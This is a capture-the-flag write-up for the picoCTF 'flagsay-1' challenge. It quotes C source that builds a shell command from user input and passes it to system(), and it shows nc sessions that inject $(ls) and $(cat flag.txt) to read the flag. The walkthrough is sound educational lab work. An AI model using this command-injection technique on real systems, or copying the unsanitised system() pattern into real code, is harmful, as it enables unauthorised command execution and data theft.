I heard you like flags, so now you can make your own! Exhilarating! Use flagsay-1! Source. Connect on shell2017.picoctf.com:20230.
System will run exactly what the program gives it
After long time i saw easy challenge. Now again we got 2 files.
flagsay-1 flag-1.c
-
Lets check what is written in
flag-1.cfile.#include <stdio.h> #include <string.h> #include <stdlib.h> #define FIRSTCHAROFFSET 129 #define LINELENGTH 35 #define NEWLINEOFFSET 21 #define LINECOUNT 6 #define BUFFLEN 1024 char flag[] = " _ \n" " //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n" " // / \n" " // / \n" " // / \n" " // / \n" " // / \n" " // / \n" " //___________________________________/ \n" " // \n" " // \n" " // \n" " // \n" " // \n" " // \n"; char commandBase[] = "/bin/echo \"%s\"\n"; void placeInFlag(char * str){ char * ptr = flag + FIRSTCHAROFFSET; char * lastInLine = ptr + LINELENGTH; size_t charRemaining = strlen(str); size_t linesDone = 0; while(charRemaining > 0 && linesDone < LINECOUNT){ if(ptr == lastInLine){ ptr += NEWLINEOFFSET; lastInLine += NEWLINEOFFSET + LINELENGTH; linesDone++; continue; } ptr[0] = str[0]; ptr++; str++; charRemaining--; } } int main(int argc, char **argv){ size_t flagSize = strlen(flag) + 1; //need to remember null terminator char * input = (char *)malloc(sizeof(char) * flagSize); input[flagSize-1] = '\x0'; fgets(input, flagSize, stdin); char * temp = strchr(input, '\n'); if(temp != NULL){ temp[0] = '\x0'; } placeInFlag(input); size_t commandLen = flagSize + strlen(commandBase) + 1; char * command = (char *)malloc(sizeof(char) * commandLen); snprintf(command, commandLen, commandBase, flag); system(command); free(input); free(command); }
Now as you can see
char commandBase[] = "/bin/echo \"%s\"\n";commandBase will echo out/ print out everything of out given input.So here we need to give the input as bash command but we need to use the Command Substitution in order to give the bash shell commmands. We can use
`` or $()these three are command substitution.
Lets try it out:-
$nc shell2017.picoctf.com 20230
$(ls)
_
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//flagsay-1
flagsay-1_no_aslr
flag.txt
xinetd_wrapper.sh /
// /
// /
// /
// /
// /
//___________________________________/
//
//
//
//
//
//
$nc shell2017.picoctf.com 20230
$(cat flag.txt)
_
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//3cd401c49122011a980e84a2c2180800 /
// /
// /
// /
// /
// /
//___________________________________/
//
//
//
//
//
//
So, i think we got the flag 3cd401c49122011a980e84a2c2180800.
Hope you liked it :)
~Thanks